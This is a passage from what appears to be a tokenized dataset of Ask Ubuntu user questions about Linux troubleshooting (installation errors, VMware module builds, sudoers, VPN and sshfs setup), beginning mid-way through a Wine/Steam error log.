fixme : advapi : eventregister { 4372afee-73b0-42ce-9821-7e134361b519 } , 0x3f006c60 , 0x3f03fd90 , 0x3f03fd88 fixme : process : setprocessshutdownparameters ( 00000100 , 00000000 ) : partial stub . fixme : imm : immgetopenstatus ( 0x1f9c70 ) : semi-stub fixme : ver : getcurrentpackageid ( 0x33e368 ( nil ) ) : stub fixme : process : setprocessdeppolicy ( 3 ) : stub fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : imm : immdisabletextframeservice stub fixme : thread : getthreadpreferreduilanguages 56 , 0x33f77c , ( nil ) 0x33f780 fixme : winsock : wsalookupservicebeginw ( 0x33f668 0x00000ff0 0x33f6a4 ) stub ! [ 0821/170132 : error : network_change_notifier_win.cc ( 174 ) ] wsalookupservicebegin failed with : 8 fixme : iphlpapi : notifyaddrchange ( handle 0x33f7b0 , overlapped 0xb25f28 ) : stub fixme : win : registerdevicenotificationw ( hwnd=0x1009a , filter=0x33f7bc , flags=0x00000000 ) returns a fake device notification handle ! fixme : win : registerdevicenotificationw ( hwnd=0x1009a , filter=0x33f7bc , flags=0x00000000 ) returns a fake device notification handle ! [ 0821/170132 : error : gpu_info_collector_win.cc ( 103 ) ] ca n't retrieve a valid winsat assessment . fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33f08c,0x00000000 ) , stub ! fixme : ver : getcurrentpackageid ( 0x270dff4 ( nil ) ) : stub fixme : ole : remunknown_queryinterface no interface for iid { 00000019-0000-0000-c000-000000000046 } fixme : ver : getcurrentpackageid ( 0x31e5d0 ( nil ) ) : stub fixme : hnetcfg : fw_apps_get__newenum 0x338cd60 , 0x7ffe0d4 fixme : hnetcfg : fw_app_put_processimagefilename 0x338d3d0 , l '' c : \\program files\\steam\\steam.exe '' fixme : hnetcfg : fw_app_put_name 0x338d3d0 , l '' steam '' fixme : hnetcfg : fw_app_put_enabled 0x338d3d0 , -1 fixme : hnetcfg : fw_apps_add 0x338d3b8 , 0x338d3d0 err : ole : cogetclassobject class { e2b3c97f-6ae1-41ac-817a-f6f92166d7dd } not registered err : ole : cogetclassobject no class object { e2b3c97f-6ae1-41ac-817a-f6f92166d7dd } could be created for context 0x1 fixme : ntdll : ntquerysysteminformation info_class system_handle_information fixme : iphlpapi : notifyaddrchange ( handle 0x15103cc , overlapped 0x15103d0 ) : stub fixme : win : registerdevicenotificationa ( hwnd=0x100a6 , filter=0x8bee4ec , flags=0x00000004 ) returns a fake device notification handle ! err : ole : cogetclassobject class { 77f10cf0-3db5-4966-b520-b7c54fd35ed6 } not registered err : ole : cogetclassobject no class object { 77f10cf0-3db5-4966-b520-b7c54fd35ed6 } could be created for context 0x1 fixme : wbemprox : wbem_locator_connectserver unsupported flags fixme : wbemprox : client_security_setblanket 0x7c6d1270 , 0x35630b8 , 10 , 0 , ( null ) , 3 , 3 , ( nil ) , 0x00000000 fixme : wbemprox : client_security_release 0x7c6d1270 fixme : wbemprox : wbem_locator_connectserver unsupported flags fixme : wbemprox : client_security_setblanket 0x7c6d1270 , 0x35630d0 , 10 , 0 , ( null ) , 3 , 3 , ( nil ) , 0x00000000 fixme : wbemprox : client_security_release 0x7c6d1270 fixme : mountmgr : harddisk_ioctl the disk_partition_info and disk_detection_info structures will not be filled fixme : wbemprox : enum_class_object_next timeout not supported fixme : mountmgr : harddisk_ioctl the disk_partition_info and disk_detection_info structures will not be filled fixme : wbemprox : enum_class_object_next timeout not supported fixme : wbemprox : enum_class_object_next timeout not supported fixme : wbemprox : enum_class_object_next timeout not supported fixme : wbemprox : enum_class_object_next timeout not supported fixme : ntdll : ntlockfile i/o completion on lock not implemented yet fixme : imm : immreleasecontext ( 0x100a8 , 0x34d7540 ) : stub fixme : winhttp : get_system_proxy_autoconfig_url no support on this platform fixme : winhttp : winhttpdetectautoproxyconfigurl discovery via dhcp not supported fixme : winhttp : get_system_proxy_autoconfig_url no support on this platform fixme : win : registerdevicenotificationa ( hwnd=0x100c0 , filter=0x33e1f4 , flags=0x00000004 ) returns a fake device notification handle ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33d6d8,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33d6d8,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33d870,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,1,0x33d870,0x00000000 ) , stub ! fixme : win : registerdevicenotificationw ( hwnd=0x10118 , filter=0x9bfe92c , flags=0x00000000 ) returns a fake device notification handle ! fixme : win : unregisterdevicenotification ( handle=0xcafeaffe ) , stub ! fixme : win : registerdevicenotificationw ( hwnd=0x20118 , filter=0x9bfe92c , flags=0x00000000 ) returns a fake device notification handle ! fixme : advapi : registertraceguidsw ( 0x100a3de0 , 0x12035da0 , { 3dada31d-19ef-4dc1-b345-037927193422 } , 1 , 0x11faf518 , ( null ) , ( null ) , 0x12035db8 ) : stub fixme : process : setprocessdeppolicy ( 3 ) : stub fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : advapi : registertraceguidsw ( 0x100a3de0 , 0x12035da0 , { 3dada31d-19ef-4dc1-b345-037927193422 } , 1 , 0x11faf518 , ( null ) , ( null ) , 0x12035db8 ) : stub fixme : gdi : gdiinitializelanguagepack stub [ 0821/170138 : error : renderer_main.cc ( 227 ) ] running without renderer sandbox fixme : module : load_library unsupported flag ( s ) used ( flags : 0x00000800 ) fixme : ver : getcurrentpackageid ( 0x1f5e9f8 ( nil ) ) : stub fixme : winhttp : get_system_proxy_autoconfig_url no support on this platform fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub when i click on 'play ' on some game : fixme : mscoree : parse_supported_runtime sku=l '' .netframework , version=v4.0 , profile=client '' not implemented fixme : mscoree : clrmetahost_getruntime unrecognized version l '' v4.0 '' the entry point method could not be loaded fixme : system : systemparametersinfow unknown action : 116 fixme : winhttp : get_system_proxy_autoconfig_url no support on this platform fixme : winhttp : get_system_proxy_autoconfig_url no support on this platform fixme : winhttp : get_system_proxy_autoconfig_url no support on this platform
514189	fatal error during grub portion of ubuntu 12.04 installation	i was installing ubuntu 12.04 lts from a usb disk when this error occurred : fatal errror : grub-install/dev/sda . my laptop is a dell vostro 1015 with 2ghz 64-bit processor , 320gb hdd and integrated graphics . when i bought this laptop , it came with pre-installed ubuntu . but , after sometime i removed it and installed windows 7 ultimate 32-bit . for the past years , i 've been using windows . then , it started slowing my system . so , i 've decided to install ubuntu . i downloaded ubuntu 32-bit from torrent and all the installation processes were going fine until when i got the above mentioned error . the reason i did n't install the 64-bit was that , when i was trying out ubuntu 64-bit , it did n't work . i ca n't boot my system . i want to install ubuntu 12.04 any how .
514190	how can i prevent the wifi to auto disconnects when idle	after few minutes when my laptop is idle it 's automatically locks the screen and disconnects from the wireless network and then reconnects when i unlock the screen . is it possible to change this thing ? ( so my downloads can keep going while my laptop is idle )
514192	how do i give ubuntu 14.04 more space ?	i installed ubuntu 14.04 alongside windows 8 for the first time yesterday , and i thought i would give it 75gb of space from my c : however , i did n't know i had to use 50gb for the installation and 16gb of swap space . how do i give ubuntu more space form my d : when installed already ? i 'm am very new to this , so please be very specific . looking forward to your answers , thanks in advance
514193	how do i re-install unity after uninstalling gnome-shell ?	i am using ubuntu 14.04 . i have big issues with the unity desktop . i installed then uninstalled gnome-shell ( using `` apt-get autoremove -- purge gnome-shell '' ) . since then , my desktop has no background and no icons . plus , and this is the bothering part , unity is very unstable . on startup , there is a huge use of memory , much more than before . sometimes , i also can not minimize a window without having the desktop freezing and having to kill the process in question with tty1 . i have tried to use : apt-get autoremove -- purge ubuntu-desktop apt-get install ubuntu-desktop but it does not change a thing . i tried to update my video drivers but it is still the same . how can i reinstall the unity desktop thoroughly ( obviously , something in its install is broken ) ? if it is not possible , is it safe that i create a new partition on my disk where i will put my files and reinstall ubuntu on the old partition ( i do have a usb install of ubuntu 14.04 but not enough space to save my files on it ) ?
514195	problem in installing gnome 3.12	i tried to install gnome 3.12 on my ubuntu gnome 14.04 ( gnome shell : 3.10 ) i did the following steps ( from this tutorial ) : $ sudo add-apt-repository ppa : gnome3-team/gnome3 $ sudo add-apt-repository ppa : gnome3-team/gnome3-staging $ sudo apt-get update $ sudo apt-get dist-upgrade the problem is that when i enter sudo apt-get dist-upgrade , it says there are no new packages to be installed : hamed @ hamed-n56jrh : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages were automatically installed and are no longer required : kde-l10n-engb kde-l10n-fa use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . seems like sudo add-apt-repository ppa : gnome3-team/gnome3 does n't add list of new packages ...
514196	problems restoring partition with `` fsarchiver restfs '' : it gets stuck !	i am having problems restoring my partition on a new ssd with fsarchiver . the creation of the archive of my partition went pretty smooth , but i can not restore it . i do not get any error , but it basically gets stuck . after one day and one night of extracting the archive , i killed it and i ran it again , this time in verbose mode , and still.. no error appears : it starts mke2fs and gets stuck . any idea on how to solve it ? do i have to do anything on the new ssd before starting the fsarchiver restfs ... ? might this be the problem ?
514202	canon pixma mg3150 wireless connection setup	any ideas how to set up canon pixma mg3150 wireless connection ? on the cannon site it says press wps button on router ... i do not have this button on my router . i run ubuntu studio 14.04 . i have also installed both drivers provided for linux by cannon . what am i missing ? i ca n't connect my printer to the router . in printers i can easily detect it with the usb cable but i want to use the wi-fi .
514209	auto-starting a gui application that requires sudo	question : i need to auto-start a gui application that requires sudo . i know i need to edit the sudoers file with : sudo visudo however , i do n't know what to write in the file . what i already tried : sudo visudo and then added the following : nanostuff all = nopasswd : /usr/lib/airvpn/airvpn.exe i also tried with : nanostuff all = nopasswd /usr/bin/x11/airvpn and nanostuff all = nopasswd /usr/bin/airvpn none of those worked . by doing : ps aux | grep airvpn i get the following output : nanostuff 6805 0.2 0.4 483520 17384 ? sl 17:13 0:01 /usr/bin/gksu -u root -m airvpn client needs administrative privileges . please enter your password . mono /usr/lib/airvpn/airvpn.exe path=/home/nanostuff/.airvpn root 6806 0.0 0.0 78604 2392 ? ss 17:13 0:00 /usr/bin/sudo -h -s -p gnome_sudo_pass -u root -- mono /usr/lib/airvpn/airvpn.exe path=/home/nanostuff/.airvpn root 6808 3.2 2.0 1257532 83032 ? sl 17:13 0:12 mono /usr/lib/airvpn/airvpn.exe path=/home/nanostuff/.airvpn root 6832 0.0 0.0 22652 3336 ? s 17:14 0:00 /usr/sbin/openvpn -- config /home/nanostuff/.airvpn/384ef91f85df5ea2abc88c7416b95bbdf2bc4299edd2850614d4e343ba721ae3.tmp.ovpn nanostuff 6951 0.0 0.0 18932 932 pts/2 s+ 17:20 0:00 grep -- color=auto airvpn i 've added sudo usr/bin/airvpn as well as gksu usr/bin/airvpn to the auto-startup and nothing ... additional info : os : ubuntu 14.04 64bits application : it 's a vpn client
514212	installing vmware 3.1.6 ( 32bit ) on ubuntu 14.04	i´ve been using vmware 3.1.6 on xubuntu 12.04 by way of a patch and it worked pretty good . i have to use 3.1.6 because i have to use these 32-bit laptops and 3.1.6 is the last version which lets me install on non-64-bit hardware . here´s the patch i´ve been using : patch now after updating to xubuntu 14.04 there´s no way for me to get it working again . i´ve tried with the upgraded install , cleaned the modules , tried with a completely new clean install , different patches etc . but now i´m at the end of my abilities . here´s the usual way i do the install : sudo bash vmware-player-3.1.6-744570.i386.bundle then link the new kernel-headers : sudo ln -s /usr/src/linux-headers- $ ( uname -r ) /include/generated/uapi/linux/version.h /usr/src/linux-headers- $ ( uname -r ) /include/linux/version.h install the build-essentials : sudo apt-get install build-essential linux-headers- $ ( uname -r ) apply the patch : sudo bash patch-modules_3.2.0.sh i now get this error : patching file vmblock-only/linux/dentry.c patching file vmblock-only/linux/filesystem.c patching file vmci-only/linux/driver.c patching file vmmon-only/linux/driver.c patching file vmmon-only/linux/hostif.c patching file vmmon-only/linux/iommu.c patching file vmnet-only/compat_netdevice.h patching file vmnet-only/driver.c patching file vmnet-only/filter.c patching file vmnet-only/hub.c patching file vmnet-only/netif.c patching file vmnet-only/userif.c patching file vsock-only/linux/af_vsock.c patching file vsock-only/linux/util.c stopping vmware services : vmware usb arbitrator done vm communication interface socket family done virtual machine communication interface done virtual machine monitor done blocking file system done using 2.6.x kernel build system . make : gehe in verzeichnis '/tmp/vmware-root/modules/vmmon-only' make -c /lib/modules/3.13.0-34-generic/build/include/.. subdirs= $ pwd srcroot= $ pwd/ . \ modulebuilddir= modules make [ 1 ] : betrete verzeichnis '/usr/src/linux-headers-3.13.0-34-generic' cc [ m ] /tmp/vmware-root/modules/vmmon-only/linux/driver.o in file included from /tmp/vmware-root/modules/vmmon-only/./include/vcpuset.h:103:0 , from /tmp/vmware-root/modules/vmmon-only/./include/modulecall.h:37 , from /tmp/vmware-root/modules/vmmon-only/./common/vmx86.h:33 , from /tmp/vmware-root/modules/vmmon-only/linux/driver.h:29 , from /tmp/vmware-root/modules/vmmon-only/linux/driver.c:100 : /tmp/vmware-root/modules/vmmon-only/./include/vm_atomic.h : in function ‘atomicassertoncompileptr’ : /tmp/vmware-root/modules/vmmon-only/./include/vm_atomic.h:2185:20 : warning : typedef ‘assertoncompilefailed’ locally defined but not used [ -wunused-local-typedefs ] typedef char assertoncompilefailed [ assertoncompilemisused ] ; \ ^ /tmp/vmware-root/modules/vmmon-only/./include/vm_atomic.h:2348:1 : note : in expansion of macro ‘make_atomic_type’ make_atomic_type ( ptr , 32 , void const * , void * , uintptr_t ) ^ /tmp/vmware-root/modules/vmmon-only/./include/vm_atomic.h : in function ‘atomicassertoncompileint’ : /tmp/vmware-root/modules/vmmon-only/./include/vm_atomic.h:2185:20 : warning : typedef ‘assertoncompilefailed’ locally defined but not used [ -wunused-local-typedefs ] typedef char assertoncompilefailed [ assertoncompilemisused ] ; \ ^ /tmp/vmware-root/modules/vmmon-only/./include/vm_atomic.h:2350:1 : note : in expansion of macro ‘make_atomic_type’ make_atomic_type ( int , 32 , int , int , int ) ^ in file included from /tmp/vmware-root/modules/vmmon-only/./include/vmware.h:40:0 , from /tmp/vmware-root/modules/vmmon-only/linux/driver.c:98 : /tmp/vmware-root/modules/vmmon-only/./include/vcpuset.h : in function ‘vcpuset_singleton’ : /tmp/vmware-root/modules/vmmon-only/./include/vm_assert.h:275:20 : warning : typedef ‘assertoncompilefailed’ locally defined but not used [ -wunused-local-typedefs ] typedef char assertoncompilefailed [ assertoncompilemisused ] ; \ ^ /tmp/vmware-root/modules/vmmon-only/./include/vcpuset.h:120:4 : note : in expansion of macro ‘assert_on_compile’ assert_on_compile ( vcpuid_invalid > = 32 ) ; // ensure test below catches invalid vcpus ^ /tmp/vmware-root/modules/vmmon-only/./include/busmem_def.h : in function ‘busmemdefs’ : /tmp/vmware-root/modules/vmmon-only/./include/vm_assert.h:275:20 : warning : typedef ‘assertoncompilefailed’ locally defined but not used [ -wunused-local-typedefs ] typedef char assertoncompilefailed [ assertoncompilemisused ] ; \ ^ /tmp/vmware-root/modules/vmmon-only/./include/vm_assert.h:297:7 : note : in definition of macro ‘my_asserts’ assertions \ ^ /tmp/vmware-root/modules/vmmon-only/./include/busmem_def.h:67:12 : note : in expansion of macro ‘assert_on_compile’ assert_on_compile ( sizeof ( busmem_pagelist ) < = page_size ) ; ) ^ /tmp/vmware-root/modules/vmmon-only/./include/pshare_ext.h : in function ‘pshare_ext’ : /tmp/vmware-root/modules/vmmon-only/./include/vm_assert.h:275:20 : warning : typedef ‘assertoncompilefailed’ locally defined but not used [ -wunused-local-typedefs ] typedef char assertoncompilefailed [ assertoncompilemisused ] ; \ ^ /tmp/vmware-root/modules/vmmon-only/./include/vm_assert.h:297:7 : note : in definition of macro ‘my_asserts’ assertions \ ^ /tmp/vmware-root/modules/vmmon-only/./include/pshare_ext.h:62:12 : note : in expansion of macro ‘assert_on_compile’ assert_on_compile ( pshare_hint_updates_max < = ^ /tmp/vmware-root/modules/vmmon-only/./include/iocontrols.h : in function ‘va64toptr’ : /tmp/vmware-root/modules/vmmon-only/./include/vm_assert.h:275:20 : warning : typedef ‘assertoncompilefailed’ locally defined but not used [ -wunused-local-typedefs ] typedef char assertoncompilefailed [ assertoncompilemisused ] ; \ ^ /tmp/vmware-root/modules/vmmon-only/./include/iocontrols.h:77:4 : note : in expansion of macro ‘assert_on_compile’ assert_on_compile ( sizeof ( void * ) == 4 ) ; ^ /tmp/vmware-root/modules/vmmon-only/./include/iocontrols.h : in function ‘ptrtova64’ : /tmp/vmware-root/modules/vmmon-only/./include/vm_assert.h:275:20 : warning : typedef ‘assertoncompilefailed’ locally defined but not used [ -wunused-local-typedefs ] typedef char assertoncompilefailed [ assertoncompilemisused ] ; \ ^ /tmp/vmware-root/modules/vmmon-only/./include/iocontrols.h:113:4 : note : in expansion of macro ‘assert_on_compile’ assert_on_compile ( sizeof ptr < = sizeof ( va64 ) ) ; ^ /tmp/vmware-root/modules/vmmon-only/linux/driver.c : in function ‘linuxdriver_ioctl’ : /tmp/vmware-root/modules/vmmon-only/linux/driver.c:2057:26 : error : invalid operands to binary == ( have ‘kuid_t’ and ‘kuid_t’ ) if ( current_euid ( ) == current_uid ( ) & & ^ /tmp/vmware-root/modules/vmmon-only/linux/driver.c:2058:20 : error : invalid operands to binary == ( have ‘kuid_t’ and ‘kuid_t’ ) current_fsuid ( ) == current_uid ( ) & & ^ /tmp/vmware-root/modules/vmmon-only/linux/driver.c:2059:26 : error : invalid operands to binary == ( have ‘kgid_t’ and ‘kgid_t’ ) current_egid ( ) == current_gid ( ) & & ^ /tmp/vmware-root/modules/vmmon-only/linux/driver.c:2060:20 : error : invalid operands to binary == ( have ‘kgid_t’ and ‘kgid_t’ ) current_fsgid ( ) == current_gid ( ) ) { ^ make [ 2 ] : *** [ /tmp/vmware-root/modules/vmmon-only/linux/driver.o ] fehler 1 make [ 1 ] : *** [ _module_/tmp/vmware-root/modules/vmmon-only ] fehler 2 make [ 1 ] : verlasse verzeichnis '/usr/src/linux-headers-3.13.0-34-generic' make : *** [ vmmon.ko ] fehler 2 make : verlasse verzeichnis '/tmp/vmware-root/modules/vmmon-only' unable to install vmmon all done , you can now run vmware player . modules sources backup can be found in the '/usr/lib/vmware/modules/source-player3.1.6-2014-08-21-12:12:54-backup ' directory seems there changed a bit with the 3.1 kernel ... i 've tried different things i found while googling , but nothing worked . found this on an issue to another thing where the errors seem to be related . but since i 'm not a programmer i can´t make anything of it : http : //ubuntuforums.org/showthread.php ? t=2217794 any help on this would be appreciated since i´d like to continue to use some of these old 32-bit laptops here with the 14.04 lts version . but without the vmware player 3.1.6 i use with a already build image and software package i would have to find a completely new emulation solution ...
514214	shared folder not accessible	ubuntu 14.04 . two harddrives . i have created a folder on the slave drive and made it a shared folder using nautilus . i can see the folder from another computer , but i ca n't see what 's in it . access denied . why ? i have folders on my primary drive shared , and that works just fine !
514215	xserver error could not create lock file	i have tried to create a config file for my xserver with x -configure in the root shell ( started ubuntu 14.04 in the save mode and selected root shell ) . but it puts out this error : ( ee ) fatal server error : ( ee ) could not create lock file int /tmp/.tx0-lock ( ee ) ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help ( ee )
514216	ubuntu login screen	i have installed lxde desktop environment for my ubuntu 14.04 and then afterwords i delete it . then my old lightdm unity login screen changed to this one http : //s24.postimg.org/j7vbsffsl/10613889_912631105417716_1354720245_n.jpg i have tried to unistall lightdm and then install it again but it doesnt help..
514218	ubuntu 14.04 login problem	often if i have to login to my pc after block for inactivity my keyboard does not type special char contained in my password , the unique way is login like guest user disconnect and reconnect with my user so special chars are typed . how can i resolve my problem ?
514221	how do you equally space out elements in a row ?	row { width : parent.width spacing : ? ? ? ? checkbox { } checkbox { } checkbox { } checkbox { } } so just to be clear , the checkboxes should be spaced in such a manner that however wide the row is , it will expand or compress the spacing in accordance to this .
514222	re-joining an active directory needs permission ?	i was using ubuntu 12.04 and my computer was set up to login to the organization 's active directory server ( where my home folder was also located ) . as i upgraded my ubuntu 12.04 to 14.04 , my computer just logins to itself ( with the previous authentication credentials ) instead of that active directory . i guess the ad configuration files are still on my computer , but can i still login to that active directory or there needs to be a permission re-granted from the admin of that server ?
514229	error creating folder : permission denied	i am using vm player for ubuntu , then using winscp i need to copy the installer of a cms to /var/www/html but it always says - error creating folder permission denied . error code : 3 error message from server : permission denied even when i try to create a folder it gives the same error . thank you ! i 'm a student adnd this is for project purposes .
514230	sudo apt-get update not working . please help	i 'm trying to install ruby on rails but ran into some problems when executing the sudo apt-get update command . here is my /etc/apt/sources.list file : http : //i.imgur.com/4epvxht.png no other ppa is activated as shown in this picture below . http : //i.imgur.com/ewjwzes.png
514234	hdmi output not working properly	excuse my bad photographs but hopefully they help to illustrate the problems i 'm having . the colour is messed up and does not look as it should . in addition to this i also do not have any audio output ( although this is n't something that bothers me ) . any help at all is greatly appreciated . if this helps at all i 'm running ubuntu 14.04.1 lts ( 64 bit ) .
514235	restoring ubuntu virtual machine after manual killing of virtualbox process ?	i was given access to an ubuntu installation running in virtualbox . ( it is managed using phpvirtualbox ) . unfortunately , the virtualbox process in the host machine was killed unexpectedly . now , if i reboot the virtual machine , the ubuntu virtual machine shows the installation screen . is it possible to recover the previous ubuntu installation ? will the 'rescue a broken system ' option or perhaps something else help in restoring the previous ubuntu installation ? ps : there are no saved states for this ubuntu virtual machine.. i 'm a noob in virtualbox . any pointers is appreciated .
514236	ca n't copy ppa package to another series : `` same version already building ''	i have a ppa with a package built for precise , which i want to also have available for trusty . i 've read that is as simple as using the `` copy packages '' feature in launchpad . when i do so , i get the message : copying failed of < package > ( < version > ) remove notification copied from : < ppa name > . target series : trusty < package > < version > in precise ( same version already building in the destination archive for precise ) it sounds like it failed to copy to `` trust '' because it is already in `` precise '' - which seems stupid .
514237	how can i push a folder in the first ?	i want to display a folder named `` work '' in the first place in a folder . unlike android systems ( which are unix-based too ) , assigning a symbol like `` # '' pushes it in the last . i can not rename it or assign numbers . question : is there any way by which i can , without renaming , push a folder to the first position instead of its original place ?
514240	after some wired flash out , i ca n't login to wmii any more , how to fix it ?	i 've been using wmii on ubuntu14.04 ( virtual machine on win7 ) for months . during which , i got pop out to login interface several times due to some wired mouse click action . but today , after i met such wired pop out , i ca n't login to wmii any more . i 'll be stuck at the interface like the bottom yellow bar is the command area for wmii . but it has no response when i press mod + p i restart my machine , and even reinstalled wmii , but every time when i tried to login wmii , i stuck at that interface . by the way , i login to wmii from the login interface , where i can choose between gnome and wmii . how to fix this ? ps : i can login to gnome normally
514242	auto-mount web server with sshfs	okay , i 'm running out of ideas here . because of the password authentication with sshfs and because ssh keys do not seem to be supported on the web server , i am simply looking for a script i can run @ reboot with the crontab . i tried this python script here ( http : //ubuntuforums.org/showthread.php ? t=135113 ) but it just does n't seem to work . note that while security is a priority , i am running out of ideas and storing the password as human-readable does not concern me right now . my data server requires a 24hr reboot , and auto-mounting afterwards is a must . for the purposes of simplicity , lets say my information is as follows : remote server : server.com remote user : user remote location : /home/user/user.server.com local mount point : /home/user/webfolder
514243	bash searches for inexistent directories upon opening terminal	i tried to install iraf a couple weeks ago but i could n't get it to work so i ended up uninstalling the whole thing . ever since , whenever i open my terminal i get this : bash : /home/ani/iraf//unix/hlib/irafarch.sh : not a directory bash : /home/ani/iraf//unix/hlib/irafuser.sh : not a directory ani @ jinx : ~ $ it has n't caused me any trouble , but i 'm guessing i 've accidentally altered something somewhere but i ca n't figure out what it is that 's causing this . any suggestions ? edit grep iraf ~/.bash* gives me the following : ani @ jinx : ~ $ grep iraf ~/.bash* ... /home/ani/.bash_login : # add iraf setup commands /home/ani/.bash_login : if [ -e /home/ani/.iraf/setup.sh ] ; then /home/ani/.bash_login : source /home/ani/.iraf/setup.sh /home/ani/.bash_profile : # add iraf setup commands /home/ani/.bash_profile : if [ -e /home/ani/.iraf/setup.sh ] ; then /home/ani/.bash_profile : source /home/ani/.iraf/setup.sh /home/ani/.bashrc : # add iraf setup commands /home/ani/.bashrc : if [ -e /home/ani/.iraf/setup.sh ] ; then /home/ani/.bashrc : source /home/ani/.iraf/setup.sh
514245	my ip address in ubuntu does n't work anymore , why ?	i have my ip address first ( 192.168.0.144 ) but when i tried to ifconfig again the result is this : lo link encap : loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 drorred:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx:0 ( 0.0 b ) what happened to my previous ip address ? i ca n't go on in winspc ... i 've error because of this . is my previous ip address still okay ? or not ?
514246	can i get my sony stylus vgp-std2 to work porpably	i am running ubuntu 14.04 on my sony vaio fit-multiflip . the stylus from sony is working as a basic mouse without right mouse button although the stylus has got two buttons which are n't doing anything . as far as i know it is not running under wacom drivers . and sony is n't supporting anything other than their oem windows . so my question is if someone has got an idea how i can get it to work probably
514247	running a .bash file in eclipse	i know this is really an eclipse issue but i ca n't seem to login in their forum . i am running eclipse juno for some c/c++ development.however , i wrote a .bash script that initiate the entire program.as input argument to this script , i have a a configuration file which is one directory lower than the .bash file . in terminal i just do : ./startenb.bash ./conf/anne it runs just fine . how can i configure the external tools in eclipse to take this file path as input argument ? any help or old thread vaguely addressing this issue is highly welcome .
514250	can not connect using l2tp ipsec vpn manager 1.0.9 on ubuntu desktop 14.04	used synaptic to install l2tp have checked the dependencies are installed too . but can not connect to work vpn when i click connect ubuntu reports error 410 $ > sudo ipsec verify checking your system to see if ipsec got installed and started correctly : version check and ipsec on-path [ ok ] linux openswan u2.6.38/k3.13.0-34-generic ( netkey ) checking for ipsec support in kernel [ ok ] saref kernel support [ n/a ] netkey : testing xfrm related proc values [ failed ] please disable /proc/sys/net/ipv4/conf/*/send_redirects or netkey will cause the sending of bogus icmp redirects ! [ failed ] please disable /proc/sys/net/ipv4/conf/*/accept_redirects or netkey will accept bogus icmp redirects ! [ ok ] checking that pluto is running [ ok ] pluto listening for ike on udp 500 [ ok ] pluto listening for nat-t on udp 4500 [ ok ] checking for 'ip ' command [ ok ] checking /bin/sh is not /bin/dash [ warning ] checking for 'iptables ' command [ ok ] opportunistic encryption support [ disabled ] syslog > aug 21 18:56:30 witty105 l2tpipsecvpncontroldaemon : opening client connection aug 21 18:56:30 witty105 l2tpipsecvpncontroldaemon : executing command ipsec setup stop aug 21 18:56:30 witty105 ipsec_setup : stopping openswan ipsec ... aug 21 18:56:32 witty105 kernel : [ 4417.877398 ] net : unregistered protocol family 15 aug 21 18:56:32 witty105 ipsec_setup : ... openswan ipsec stopped aug 21 18:56:32 witty105 l2tpipsecvpncontroldaemon : command ipsec setup stop finished with exit code 0 aug 21 18:56:32 witty105 l2tpipsecvpncontroldaemon : executing command service xl2tpd stop aug 21 18:56:32 witty105 xl2tpd [ 1307 ] : death_handler : fatal signal 15 received aug 21 18:56:32 witty105 l2tpipsecvpncontroldaemon : command service xl2tpd stop finished with exit code 0 aug 21 18:56:32 witty105 l2tpipsecvpncontroldaemon : opening client connection aug 21 18:56:32 witty105 l2tpipsecvpncontroldaemon : closing client connection aug 21 18:56:32 witty105 l2tpipsecvpncontroldaemon : executing command service xl2tpd start aug 21 18:56:32 witty105 xl2tpd [ 5487 ] : setsockopt recvref [ 30 ] : protocol not available aug 21 18:56:32 witty105 xl2tpd [ 5487 ] : this binary does not support kernel l2tp . aug 21 18:56:32 witty105 xl2tpd [ 5488 ] : xl2tpd version xl2tpd-1.3.6 started on witty105 pid:5488 aug 21 18:56:32 witty105 xl2tpd [ 5488 ] : written by mark spencer , copyright ( c ) 1998 , adtran , inc. aug 21 18:56:32 witty105 xl2tpd [ 5488 ] : forked by scott balmos and david stipp , ( c ) 2001 aug 21 18:56:32 witty105 xl2tpd [ 5488 ] : inherited by jeff mcadams , ( c ) 2002 aug 21 18:56:32 witty105 xl2tpd [ 5488 ] : forked again by xelerance ( www.xelerance.com ) ( c ) 2006 aug 21 18:56:32 witty105 xl2tpd [ 5488 ] : listening on ip address 0.0.0.0 , port 1701 aug 21 18:56:32 witty105 l2tpipsecvpncontroldaemon : command service xl2tpd start finished with exit code 0 aug 21 18:56:33 witty105 l2tpipsecvpncontroldaemon : closing client connection aug 21 18:56:33 witty105 xl2tpd [ 5488 ] : connecting to host vpn.mycompany.com , port 1701 aug 21 18:56:38 witty105 xl2tpd [ 5488 ] : maximum retries exceeded for tunnel 47541 . closing . aug 21 18:56:38 witty105 xl2tpd [ 5488 ] : connection 0 closed to 50.*** . ***.206 , port 1701 ( timeout ) aug 21 18:56:38 witty105 l2tpipsecvpncontroldaemon : opening client connection aug 21 18:56:38 witty105 l2tpipsecvpncontroldaemon : executing command service xl2tpd stop aug 21 18:56:38 witty105 xl2tpd [ 5488 ] : death_handler : fatal signal 15 received aug 21 18:56:38 witty105 l2tpipsecvpncontroldaemon : command service xl2tpd stop finished with exit code 0 aug 21 18:56:38 witty105 l2tpipsecvpncontroldaemon : closing client connection myco-vpn.options.xl2tpd plugin passprompt.so ipcp-accept-local ipcp-accept-remote idle 72000 ktune noproxyarp asyncmap 0 noauth crtscts lock hide-password modem noipx ipparam l2tpipsecvpn-myco-vpn promptprog `` /usr/bin/l2tpipsecvpn '' refuse-eap refuse-chap refuse-mschap refuse-mschap-v2 remotename `` '' name `` myname @ mycompany.com '' password `` mypass '' ipsec.config version 2.0 # conforms to second version of ipsec.conf specification config setup plutodebug= '' parsing emitting control private '' # plutodebug=none strictcrlpolicy=no nat_traversal=yes interfaces= % defaultroute oe=off # which ipsec stack to use . netkey , klips , 